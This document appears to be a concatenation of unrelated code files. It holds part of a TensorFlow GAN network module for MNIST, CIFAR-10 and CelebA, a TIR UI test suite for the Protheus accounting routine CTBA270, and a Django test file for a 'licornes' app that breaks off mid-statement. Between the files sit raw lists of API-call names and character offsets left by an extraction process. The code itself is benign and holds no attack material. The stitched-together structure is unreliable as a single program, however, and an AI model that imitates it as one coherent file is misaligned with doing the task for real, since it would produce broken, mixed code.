    Returns one raw logit per input sample (shape (batch,)).
    """
    net_dim = 64
    use_sn = True
    with tf.variable_scope('Discriminator', reuse=tf.AUTO_REUSE):
        net = x
        layer = 0
        # four (3x3 stride-1, 4x4 stride-2) conv pairs at widths 1x, 2x, 4x, 4x net_dim
        for mult in (1, 2, 4, 4):
            net = conv2d(net, mult * net_dim, 3, 1, sn=use_sn,
                         update_collection=update_collection, name='conv%d' % layer)
            net = lrelu(net)
            net = conv2d(net, mult * net_dim, 4, 2, sn=use_sn,
                         update_collection=update_collection, name='conv%d' % (layer + 1))
            net = lrelu(net)
            layer += 2
        # final widening conv (no activation), flatten, linear projection to one logit
        net = conv2d(net, 8 * net_dim, 3, 1, sn=use_sn,
                     update_collection=update_collection, name='output')
        net = tf.reshape(net, [-1, 4 * 4 * 8 * net_dim])
        net = linear(net, 1, sn=use_sn, update_collection=update_collection, name='linear')
        return tf.reshape(net, [-1])
def celeba_discriminator_resnet(x, update_collection=None, is_training=False):
    """Spectrally-normalized ResNet discriminator for CelebA; returns raw logits."""
    with tf.variable_scope('Discriminator', reuse=tf.AUTO_REUSE):
        net = inblock(x, 128, sn=True, update_collection=update_collection, name='block_0')  # 16 x 16
        net = resblock_down(net, 128, sn=True, update_collection=update_collection, name='block_1')  # 8 x 8
        # three residual blocks without further downsampling
        for idx in (2, 3, 4):
            net = resblock_down(net, 128, sn=True, update_collection=update_collection,
                                downsample=False, name='block_%d' % idx)
        net = tf.nn.relu(net)
        net = tf.reduce_sum(net, [1, 2])  # global sum pooling
        net = linear(net, 1, sn=True, update_collection=update_collection, name='linear')
        return tf.reshape(net, [-1])
def celeba_encoder(x, is_training=False, use_bn=False, net_dim=64, latent_dim=128):
    """Convolutional encoder for CelebA.

    Five conv stages (the last four stride-2), then a linear head whose
    2*latent_dim output is split into two latent_dim-wide halves.

    Args:
        x: input image batch.
        is_training: batch-norm mode (only relevant when use_bn is True).
        use_bn: insert batch norm after each conv.
        net_dim: base channel width.
        latent_dim: width of each returned half.

    Returns:
        Tuple of two tensors, each of shape (batch, latent_dim).
    """
    with tf.variable_scope('Encoder', reuse=tf.AUTO_REUSE):
        x = conv2d(x, net_dim, 3, 1, name='conv0')
        if use_bn:
            x = batch_norm(x, is_training=is_training, name='bn0')
        x = tf.nn.relu(x)
        x = conv2d(x, 2*net_dim, 4, 2, name='conv1')
        if use_bn:
            x = batch_norm(x, is_training=is_training, name='bn1')
        x = tf.nn.relu(x)
        x = conv2d(x, 4*net_dim, 4, 2, name='conv2')
        if use_bn:
            x = batch_norm(x, is_training=is_training, name='bn2')
        x = tf.nn.relu(x)
        x = conv2d(x, 8*net_dim, 4, 2, name='conv3')
        if use_bn:
            x = batch_norm(x, is_training=is_training, name='bn3')
        x = tf.nn.relu(x)
        x = conv2d(x, 8*net_dim, 4, 2, name='conv4')
        if use_bn:
            # BUG FIX: this batch norm was also named 'bn3'; under AUTO_REUSE and
            # matching shapes (both stages are 8*net_dim wide) it silently shared
            # variables with the previous stage. Renamed to 'bn4'.
            x = batch_norm(x, is_training=is_training, name='bn4')
        x = tf.nn.relu(x)
        x = tf.reshape(x, [-1, 4 * 4 * 8 * net_dim])
        x = linear(x, 2*latent_dim, name='linear')
        return x[:, :latent_dim], x[:, latent_dim:]
def celeba_encoder_resnet(x, is_training=False, use_bn=False, net_dim=64, latent_dim=128):
    """ResNet encoder for CelebA; returns the two latent_dim-wide halves of a linear head."""
    with tf.variable_scope('Encoder', reuse=tf.AUTO_REUSE):
        net = inblock(x, 128, sn=False, name='block_0')  # 16 x 16
        net = resblock_down(net, 128, sn=False, name='block_1')  # 8 x 8
        # three residual blocks without further downsampling
        for idx in (2, 3, 4):
            net = resblock_down(net, 128, sn=False, downsample=False, name='block_%d' % idx)
        net = tf.nn.relu(net)
        net = tf.reduce_sum(net, [1, 2])  # global sum pooling
        net = linear(net, 2 * latent_dim, sn=False, name='linear')
        return net[:, :latent_dim], net[:, latent_dim:]
# Per-dataset network factories, indexed [0] = plain conv architecture,
# [1] = ResNet architecture. MNIST / Fashion-MNIST have no ResNet variant,
# so the plain builder fills both slots.
GENERATOR_DICT = {'mnist': [mnist_generator, mnist_generator],
                  'f-mnist': [mnist_generator, mnist_generator],
                  'cifar-10': [cifar10_generator, cifar10_generator_resnet],
                  'celeba': [celeba_generator, celeba_generator_resnet]}
DISCRIMINATOR_DICT = {'mnist': [mnist_discriminator, mnist_discriminator],
                      'f-mnist': [mnist_discriminator, mnist_discriminator],
                      'cifar-10': [cifar10_discriminator, cifar10_discriminator_resnet],
                      'celeba': [celeba_discriminator, celeba_discriminator_resnet]}
ENCODER_DICT = {'mnist': [mnist_encoder, mnist_encoder],
                'f-mnist': [mnist_encoder, mnist_encoder],
                'cifar-10': [cifar10_encoder, cifar10_encoder_resnet],
                'celeba': [celeba_encoder, celeba_encoder_resnet]
                }
def get_generator_fn(dataset_name, use_resblock=False):
    """Return the generator builder for *dataset_name* (ResNet variant if requested)."""
    return GENERATOR_DICT[dataset_name][1 if use_resblock else 0]
def get_discriminator_fn(dataset_name, use_resblock=False, use_label=False):
    """Return the discriminator builder for *dataset_name* (ResNet variant if requested).

    ``use_label`` is accepted for call-site compatibility but is not consulted here.
    """
    return DISCRIMINATOR_DICT[dataset_name][1 if use_resblock else 0]
def get_encoder_fn(dataset_name, use_resblock=False):
    """Return the encoder builder for *dataset_name* (ResNet variant if requested)."""
    return ENCODER_DICT[dataset_name][1 if use_resblock else 0]
|
[
"tensorflow.nn.relu",
"tensorflow.reduce_sum",
"tensorflow.reshape",
"tensorflow.variable_scope",
"tensorflow.tanh",
"tensorflow.sigmoid"
] |
[((169, 220), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Generator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Generator', reuse=tf.AUTO_REUSE)\n", (186, 220), True, 'import tensorflow as tf\n'), ((386, 404), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (396, 404), True, 'import tensorflow as tf\n'), ((422, 465), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4, 4, 4 * net_dim]'], {}), '(output, [-1, 4, 4, 4 * net_dim])\n', (432, 465), True, 'import tensorflow as tf\n'), ((668, 686), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (678, 686), True, 'import tensorflow as tf\n'), ((895, 913), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (905, 913), True, 'import tensorflow as tf\n'), ((1003, 1021), 'tensorflow.sigmoid', 'tf.sigmoid', (['output'], {}), '(output)\n', (1013, 1021), True, 'import tensorflow as tf\n'), ((1162, 1217), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Discriminator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Discriminator', reuse=tf.AUTO_REUSE)\n", (1179, 1217), True, 'import tensorflow as tf\n'), ((1670, 1710), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 4 * net_dim]'], {}), '(x, [-1, 4 * 4 * 4 * net_dim])\n', (1680, 1710), True, 'import tensorflow as tf\n'), ((1814, 1833), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1]'], {}), '(x, [-1])\n', (1824, 1833), True, 'import tensorflow as tf\n'), ((1928, 1977), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Encoder"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Encoder', reuse=tf.AUTO_REUSE)\n", (1945, 1977), True, 'import tensorflow as tf\n'), ((2128, 2141), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (2138, 2141), True, 'import tensorflow as tf\n'), ((2294, 2307), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (2304, 2307), True, 'import tensorflow as tf\n'), ((2460, 2473), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (2470, 2473), True, 'import tensorflow as 
tf\n'), ((2487, 2527), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 4 * net_dim]'], {}), '(x, [-1, 4 * 4 * 4 * net_dim])\n', (2497, 2527), True, 'import tensorflow as tf\n'), ((2695, 2746), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Generator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Generator', reuse=tf.AUTO_REUSE)\n", (2712, 2746), True, 'import tensorflow as tf\n'), ((2822, 2857), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4, 4, 256]'], {}), '(output, [-1, 4, 4, 256])\n', (2832, 2857), True, 'import tensorflow as tf\n'), ((3223, 3241), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (3233, 3241), True, 'import tensorflow as tf\n'), ((3318, 3333), 'tensorflow.tanh', 'tf.tanh', (['output'], {}), '(output)\n', (3325, 3333), True, 'import tensorflow as tf\n'), ((3448, 3503), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Discriminator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Discriminator', reuse=tf.AUTO_REUSE)\n", (3465, 3503), True, 'import tensorflow as tf\n'), ((4014, 4032), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (4024, 4032), True, 'import tensorflow as tf\n'), ((4050, 4079), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['output', '[1, 2]'], {}), '(output, [1, 2])\n', (4063, 4079), True, 'import tensorflow as tf\n'), ((4192, 4216), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1]'], {}), '(output, [-1])\n', (4202, 4216), True, 'import tensorflow as tf\n'), ((4338, 4389), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Generator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Generator', reuse=tf.AUTO_REUSE)\n", (4355, 4389), True, 'import tensorflow as tf\n'), ((4555, 4573), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (4565, 4573), True, 'import tensorflow as tf\n'), ((4591, 4634), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4, 4, 8 * net_dim]'], {}), '(output, [-1, 4, 4, 8 * net_dim])\n', (4601, 4634), True, 'import tensorflow as tf\n'), 
((4996, 5011), 'tensorflow.tanh', 'tf.tanh', (['output'], {}), '(output)\n', (5003, 5011), True, 'import tensorflow as tf\n'), ((5154, 5209), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Discriminator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Discriminator', reuse=tf.AUTO_REUSE)\n", (5171, 5209), True, 'import tensorflow as tf\n'), ((6123, 6163), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 8 * net_dim]'], {}), '(x, [-1, 4 * 4 * 8 * net_dim])\n', (6133, 6163), True, 'import tensorflow as tf\n'), ((6261, 6280), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1]'], {}), '(x, [-1])\n', (6271, 6280), True, 'import tensorflow as tf\n'), ((6377, 6426), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Encoder"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Encoder', reuse=tf.AUTO_REUSE)\n", (6394, 6426), True, 'import tensorflow as tf\n'), ((6577, 6590), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (6587, 6590), True, 'import tensorflow as tf\n'), ((6743, 6756), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (6753, 6756), True, 'import tensorflow as tf\n'), ((6909, 6922), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (6919, 6922), True, 'import tensorflow as tf\n'), ((7075, 7088), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (7085, 7088), True, 'import tensorflow as tf\n'), ((7102, 7142), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 8 * net_dim]'], {}), '(x, [-1, 4 * 4 * 8 * net_dim])\n', (7112, 7142), True, 'import tensorflow as tf\n'), ((7350, 7399), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Encoder"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Encoder', reuse=tf.AUTO_REUSE)\n", (7367, 7399), True, 'import tensorflow as tf\n'), ((7766, 7784), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (7776, 7784), True, 'import tensorflow as tf\n'), ((7802, 7831), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['output', '[1, 2]'], {}), '(output, [1, 2])\n', (7815, 7831), True, 'import 
tensorflow as tf\n'), ((8085, 8136), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Generator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Generator', reuse=tf.AUTO_REUSE)\n", (8102, 8136), True, 'import tensorflow as tf\n'), ((8308, 8351), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4, 4, 8 * net_dim]'], {}), '(output, [-1, 4, 4, 8 * net_dim])\n', (8318, 8351), True, 'import tensorflow as tf\n'), ((8728, 8743), 'tensorflow.tanh', 'tf.tanh', (['output'], {}), '(output)\n', (8735, 8743), True, 'import tensorflow as tf\n'), ((8828, 8879), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Generator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Generator', reuse=tf.AUTO_REUSE)\n", (8845, 8879), True, 'import tensorflow as tf\n'), ((8955, 8990), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1, 4, 4, 256]'], {}), '(output, [-1, 4, 4, 256])\n', (8965, 8990), True, 'import tensorflow as tf\n'), ((9439, 9457), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (9449, 9457), True, 'import tensorflow as tf\n'), ((9534, 9549), 'tensorflow.tanh', 'tf.tanh', (['output'], {}), '(output)\n', (9541, 9549), True, 'import tensorflow as tf\n'), ((9691, 9746), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Discriminator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Discriminator', reuse=tf.AUTO_REUSE)\n", (9708, 9746), True, 'import tensorflow as tf\n'), ((10923, 10963), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 8 * net_dim]'], {}), '(x, [-1, 4 * 4 * 8 * net_dim])\n', (10933, 10963), True, 'import tensorflow as tf\n'), ((11061, 11080), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1]'], {}), '(x, [-1])\n', (11071, 11080), True, 'import tensorflow as tf\n'), ((11170, 11225), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Discriminator"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Discriminator', reuse=tf.AUTO_REUSE)\n", (11187, 11225), True, 'import tensorflow as tf\n'), ((11860, 11878), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], 
{}), '(output)\n', (11870, 11878), True, 'import tensorflow as tf\n'), ((11896, 11925), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['output', '[1, 2]'], {}), '(output, [1, 2])\n', (11909, 11925), True, 'import tensorflow as tf\n'), ((12038, 12062), 'tensorflow.reshape', 'tf.reshape', (['output', '[-1]'], {}), '(output, [-1])\n', (12048, 12062), True, 'import tensorflow as tf\n'), ((12158, 12207), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Encoder"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Encoder', reuse=tf.AUTO_REUSE)\n", (12175, 12207), True, 'import tensorflow as tf\n'), ((12358, 12371), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (12368, 12371), True, 'import tensorflow as tf\n'), ((12524, 12537), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (12534, 12537), True, 'import tensorflow as tf\n'), ((12690, 12703), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (12700, 12703), True, 'import tensorflow as tf\n'), ((12856, 12869), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (12866, 12869), True, 'import tensorflow as tf\n'), ((13022, 13035), 'tensorflow.nn.relu', 'tf.nn.relu', (['x'], {}), '(x)\n', (13032, 13035), True, 'import tensorflow as tf\n'), ((13049, 13089), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 4 * 4 * 8 * net_dim]'], {}), '(x, [-1, 4 * 4 * 8 * net_dim])\n', (13059, 13089), True, 'import tensorflow as tf\n'), ((13296, 13345), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""Encoder"""'], {'reuse': 'tf.AUTO_REUSE'}), "('Encoder', reuse=tf.AUTO_REUSE)\n", (13313, 13345), True, 'import tensorflow as tf\n'), ((13800, 13818), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (13810, 13818), True, 'import tensorflow as tf\n'), ((13836, 13865), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['output', '[1, 2]'], {}), '(output, [1, 2])\n', (13849, 13865), True, 'import tensorflow as tf\n'), ((4885, 4903), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', 
(4895, 4903), True, 'import tensorflow as tf\n'), ((8610, 8628), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (8620, 8628), True, 'import tensorflow as tf\n')]
|
from tir import Webapp
import unittest
class CTBA270(unittest.TestCase):
    """TIR UI tests for the Protheus accounting routine CTBA270 (off-line apportionment, 'Rateio')."""
    @classmethod
    def setUpClass(inst):
        # Open the SIGACTB module on branch "M SP 02" and start routine CTBA270.
        inst.oHelper = Webapp()
        inst.oHelper.Setup("SIGACTB", "29/06/2015", "T1", "M SP 02 ", "34")
        inst.oHelper.Program("CTBA270")
    ###########################################################################################
    # Test case 001 - Include an apportionment (Rateio)                                       #
    # 2019-08-29                                                                              #
    ###########################################################################################
    def test_CTBA270_001(self):
        """Create apportionment CTLR02 with two counterpart grid rows (80% / 20%)."""
        self.oHelper.SetButton("Incluir")
        self.oHelper.SetBranch("M SP 02")
        # Header fields
        self.oHelper.SetValue("Codigo Rateio", "CTLR02")
        self.oHelper.SetValue("Descricao", "Rateio Incluido")
        self.oHelper.SetValue("Tipo", "1 - Movimento Mes")
        #self.oHelper.SetValue("Perc. Base","100,00")
        # Origin and counterpart accounts / cost centers
        self.oHelper.SetValue("Ctq_CtOri", "11101001", name_attr=True)
        self.oHelper.SetValue("cCtq_CtPar", "11101001", name_attr=True)
        self.oHelper.SetValue("cCtq_CCOri", "01101", name_attr=True)
        self.oHelper.SetValue("cCtq_CCPar", "01101", name_attr=True)
        self.oHelper.LoadGrid()
        # First grid row: 80%
        self.oHelper.SetValue("CTQ_CTCPAR", "1110100101", grid=True, row=1)
        self.oHelper.SetValue("CTQ_CCCPAR", "0110101", grid=True, row=1)
        self.oHelper.SetValue("CTQ_VALOR", "80,00", grid=True, row=1)
        self.oHelper.LoadGrid()
        self.oHelper.SetKey("Down", grid=True)
        #self.oHelper.SetFocus("CTQ_CTCPAR", grid_cell=True,row_number=2)
        self.oHelper.LoadGrid()
        # Second grid row: 20%
        self.oHelper.SetValue("CTQ_CTCPAR", "1110100102", grid=True, row=2)
        self.oHelper.SetValue("CTQ_CCCPAR", "0110102", grid=True, row=2)
        self.oHelper.SetValue("CTQ_VALOR", "20,00", grid=True, row=2)
        self.oHelper.LoadGrid()
        self.oHelper.SetButton("Salvar")
        self.oHelper.SetButton("Cancelar")
        self.oHelper.AssertTrue()
    ###########################################################################################
    # Test case 002 - Legend and processing-log dialogs                                       #
    # 2019-08-29                                                                              #
    ###########################################################################################
    def test_CTBA270_002(self):
        """Open the legend and the processing log; both dialogs must be reachable."""
        self.oHelper.SetButton("Outras Ações", "Legenda")
        self.oHelper.WaitShow("Desbloqueado e Indice atualizado")
        self.oHelper.SetButton("Fechar")
        self.oHelper.SetButton("Outras Ações", "Log Proc")
        self.oHelper.SetButton("Detalhes")
        self.oHelper.SetButton("Confirmar")
        self.oHelper.SetButton("Sair")
        self.oHelper.AssertTrue()
    ###########################################################################################
    # Test case 003 - Change the cost center of an existing apportionment                     #
    # 2019-08-29                                                                              #
    ###########################################################################################
    def test_CTBA270_003(self):
        """Alter rateio TR0003's counterpart cost center and verify it was persisted."""
        self.oHelper.AddParameter("MV_CTBHRAT","","1")
        self.oHelper.SetParameters()
        self.oHelper.SearchBrowse("D MG 01 TR0003")
        self.oHelper.SetButton("Alterar")
        self.oHelper.WaitShow("Rateios Off-Line - ALTERAR")
        self.oHelper.SetValue("CTQ_CCCPAR", "CCCTB270A", grid=True, row=1)
        self.oHelper.LoadGrid()
        self.oHelper.SetButton("Salvar")
        # Re-open in view mode and check every field kept / received its value.
        self.oHelper.SetButton("Visualizar")
        self.oHelper.CheckResult("cCtq_Rateio", "TR0003", name_attr=True)
        self.oHelper.CheckResult("cCtq_Tipo", "1 - Movimento Mes", name_attr=True)
        self.oHelper.CheckResult("cCtq_CtOri", "OCTBA27001", name_attr=True)
        self.oHelper.CheckResult("cCtq_CtPar", "PCTBA27001", name_attr=True)
        self.oHelper.CheckResult("CTQ_CCCPAR", "CCCTB270A", grid=True, line=1)
        self.oHelper.LoadGrid()
        self.oHelper.SetButton("Confirmar")
        self.oHelper.RestoreParameters()
        self.oHelper.AssertTrue()
    ###########################################################################################
    # Test case 004 - Include an apportionment with parameter MV_REDUZID, entering            #
    #                 field CTQ_CCPAR twice (shortened account codes enabled)                 #
    # https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T43763              #
    ###########################################################################################
    def test_CTBA270_004(self):
        """Create rateio CTB279 with MV_REDUZID=S / MV_CTBCACH=1, re-entering the counterpart account."""
        self.oHelper.AddParameter("MV_REDUZID","","S")
        self.oHelper.AddParameter("MV_CTBCACH","","1")
        self.oHelper.SetParameters()
        self.oHelper.SetButton("Incluir")
        self.oHelper.SetBranch("M SP 02")
        self.oHelper.SetValue("Codigo Rateio", "CTB279")
        self.oHelper.SetValue("Descricao", "CTB270_REDUZIDO")
        self.oHelper.SetValue("Tipo", "1 - Movimento Mes")
        self.oHelper.SetValue("Perc. Base","100,00")
        self.oHelper.SetValue("Ctq_CtOri", "203010100", name_attr=True)
        #self.oHelper.LoadGrid()
        self.oHelper.SetValue("CTQ_CTCPAR", "203010100", grid=True, row=1)
        self.oHelper.SetValue("CTQ_VALOR", "101,34", grid=True, row=1)
        self.oHelper.LoadGrid()
        # Intentionally re-enter the same counterpart account (the scenario under test).
        self.oHelper.SetValue("CTQ_CTCPAR", "203010100", grid=True, row=1)
        self.oHelper.LoadGrid()
        self.oHelper.SetButton("Salvar")
        self.oHelper.SetButton("Cancelar")
        self.oHelper.RestoreParameters()
        self.oHelper.AssertTrue()
    ###############################################################################################
    # Test case 005 - Include an apportionment with MV_REDUZID / MV_CTBCACH = 1,                  #
    #                 typing the shortened (reduzido) account code                                 #
    # https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T43827                   #
    ###############################################################################################
    def test_CTBA270_005(self):
        """Create rateio CTB271 with MV_REDUZID=S / MV_CTBCACH=1 using the shortened account code."""
        self.oHelper.AddParameter("MV_REDUZID","","S")
        self.oHelper.AddParameter("MV_CTBCACH","","1")
        self.oHelper.SetParameters()
        self.oHelper.SetButton("Incluir")
        self.oHelper.SetBranch("M SP 02")
        self.oHelper.SetValue("Codigo Rateio", "CTB271")
        self.oHelper.SetValue("Descricao", "CTB271_REDUZIDO")
        self.oHelper.SetValue("Tipo", "1 - Movimento Mes")
        self.oHelper.SetValue("Perc. Base","100,00")
        self.oHelper.SetValue("Ctq_CtOri", "203010100", name_attr=True)
        self.oHelper.LoadGrid()
        self.oHelper.SetValue("CTQ_CTCPAR", "203010100", grid=True, row=1)
        self.oHelper.SetValue("CTQ_VALOR", "200,34", grid=True, row=1)
        self.oHelper.LoadGrid()
        #self.oHelper.SetKey("Down", grid=True)
        self.oHelper.SetButton("Salvar")
        self.oHelper.SetButton("Cancelar")
        self.oHelper.RestoreParameters()
        self.oHelper.AssertTrue()
    ###############################################################################################
    # Test case 006 - Include an apportionment with a mandatory cost center,                      #
    #                 leaving the cost centers empty until the warning dialog appears             #
    # https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/171512                        #
    ###############################################################################################
    def test_CTBA270_006(self):
        """Create rateio R23883, trigger the missing-cost-center warning, fix the fields, then verify."""
        self.oHelper.SetButton("Incluir")
        self.oHelper.SetBranch("D MG 01 ")
        # Header
        self.oHelper.SetValue("Codigo Rateio", "R23883")
        self.oHelper.SetValue("Descricao", "CTA CC OBRIGAT")
        self.oHelper.SetValue("Tipo", "1 - Movimento Mes")
        self.oHelper.SetValue("Perc. Base","100,00")
        # Origin
        self.oHelper.SetValue("Ctq_CtOri", "CTBA28150002", name_attr=True)
        # Counterpart (partida)
        self.oHelper.SetValue("cCtq_CtPar", "CTBA28130002", name_attr=True)
        # Offsetting entry (contra partida)
        self.oHelper.SetValue("CTQ_CTCPAR", "CTBA28130001", grid=True, row=1)
        self.oHelper.SetValue("CTQ_VALOR", "100,00", grid=True, row=1)
        self.oHelper.LoadGrid()
        self.oHelper.SetButton("Salvar")
        # Warning dialog: refuse to save without the mandatory cost centers.
        self.oHelper.SetButton("Não")
        # Fill in the fields that were left empty.
        # Origin
        self.oHelper.SetValue("cCtq_CCOri", "CTB270501", name_attr=True)
        # Counterpart
        self.oHelper.SetValue("cCtq_CCPar", "CTB270302", name_attr=True)
        # Offsetting entry
        self.oHelper.SetValue("CTQ_CCCPAR", "CTB270301", grid=True, row=1)
        self.oHelper.LoadGrid()
        self.oHelper.SetButton("Salvar")
        # After saving, the routine re-opens the inclusion screen.
        self.oHelper.SetButton("Cancelar")
        # Result verification:
        # position the browse on the included rateio (branch + rateio code).
        self.oHelper.SearchBrowse("D MG 01 R23883")
        self.oHelper.SetButton("Visualizar")
        # Header
        self.oHelper.CheckResult("Codigo Rateio", "R23883")
        # Origin
        self.oHelper.CheckResult("Ctq_CtOri", "CTBA28150002", name_attr=True)
        self.oHelper.CheckResult("cCtq_CCOri", "CTB270501", name_attr=True)
        # Counterpart
        self.oHelper.CheckResult("cCtq_CtPar", "CTBA28130002", name_attr=True)
        self.oHelper.CheckResult("cCtq_CCPar", "CTB270302", name_attr=True)
        # Offsetting entry
        self.oHelper.CheckResult("CTQ_CTCPAR", "CTBA28130001", grid=True, line=1)
        self.oHelper.CheckResult("CTQ_CCCPAR", "CTB270301", grid=True, line=1)
        self.oHelper.CheckResult("CTQ_VALOR", "100,00", grid=True, line=1)
        self.oHelper.LoadGrid()
        self.oHelper.AssertTrue()
    @classmethod
    def tearDownClass(inst):
        # Close the browser/session opened in setUpClass.
        inst.oHelper.TearDown()
if __name__ == '__main__':
    # Allow running this suite directly: python CTBA270.py
    unittest.main()
|
[
"unittest.main",
"tir.Webapp"
] |
[((10846, 10861), 'unittest.main', 'unittest.main', ([], {}), '()\n', (10859, 10861), False, 'import unittest\n'), ((143, 151), 'tir.Webapp', 'Webapp', ([], {}), '()\n', (149, 151), False, 'from tir import Webapp\n')]
|
from django.test import TestCase
# Create your tests here.
from django.urls import reverse
from licornes.models import Licorne
from licornes.models import User
from licornes.models import Etape
from django.conf import settings
from bs4 import BeautifulSoup
import re
import os
class IndexViewTest(TestCase):
    """Exercise the licorne index view: URL, template, context and markup."""

    @classmethod
    def setUpTestData(cls):
        # Create a few users, each owning the same number of licornes.
        number_of_creators = 2
        number_of_licornes = 3
        cls.total_licornes = number_of_creators * number_of_licornes
        for user_id in range(number_of_creators):
            User.objects.create(username=f"utilisateur {user_id}")
            u = User.objects.get(username=f"utilisateur {user_id}")
            for licorne_id in range(number_of_licornes):
                Licorne.objects.create(
                    nom=f'Licorne {licorne_id} de {user_id}',
                    identifiant=f'{user_id}-{licorne_id}',
                    createur=u,
                )

    def test_view_url_exists_at_desired_location(self):
        response = self.client.get('/licornes/')
        self.assertEqual(response.status_code, 200)

    def test_view_url_accessible_by_name(self):
        response = self.client.get(reverse('index'))
        self.assertEqual(response.status_code, 200)

    def test_view_uses_correct_template(self):
        response = self.client.get(reverse('index'))
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'licornes/index.html')

    def test_licornes_are_present(self):
        response = self.client.get(reverse('index'))
        self.assertEqual(response.status_code, 200)
        # assertIn / assertEqual give far more useful failure messages than
        # the equivalent assertTrue(... in ...) / assertTrue(... == ...).
        self.assertIn('meslicornes', response.context)
        self.assertEqual(len(response.context['meslicornes']), self.total_licornes)
        self.assertIn("Licorne 0 de 0", str(response.content))

    def test_licornes_ont_badge(self):
        response = self.client.get(reverse('index'))
        soup = BeautifulSoup(response.content, features="html.parser")
        # Every licorne heading is expected to carry a Bootstrap badge.
        badges_de_licornes = sum(
            1 for h2 in soup.find_all("h2")
            if h2.span and "badge" in h2.span["class"]
        )
        self.assertTrue(badges_de_licornes)
        self.assertEqual(badges_de_licornes, self.total_licornes)

    def test_titres_present(self):
        response = self.client.get(reverse('index'))
        self.assertEqual(response.status_code, 200)
        self.assertInHTML("Mes licornes", str(response.content))
        self.assertInHTML("Trajet", str(response.content))

    def test_bouton_ajouter_present(self):
        response = self.client.get(reverse('index'))
        self.assertEqual(response.status_code, 200)
        self.assertIn("+ Ajouter une licorne", str(response.content))

    def test_div_map_present(self):
        response = self.client.get(reverse('index'))
        soup = BeautifulSoup(response.content, features="html.parser")
        # The map container must exist for the front-end script to draw into.
        self.assertIsNotNone(soup.find("div", id="map"))

    def test_liens_vers_licornes_presents(self):
        response = self.client.get(reverse('index'))
        soup = BeautifulSoup(response.content, features="html.parser")
        # .get() avoids a KeyError on anchors that carry no href attribute.
        self.assertTrue(
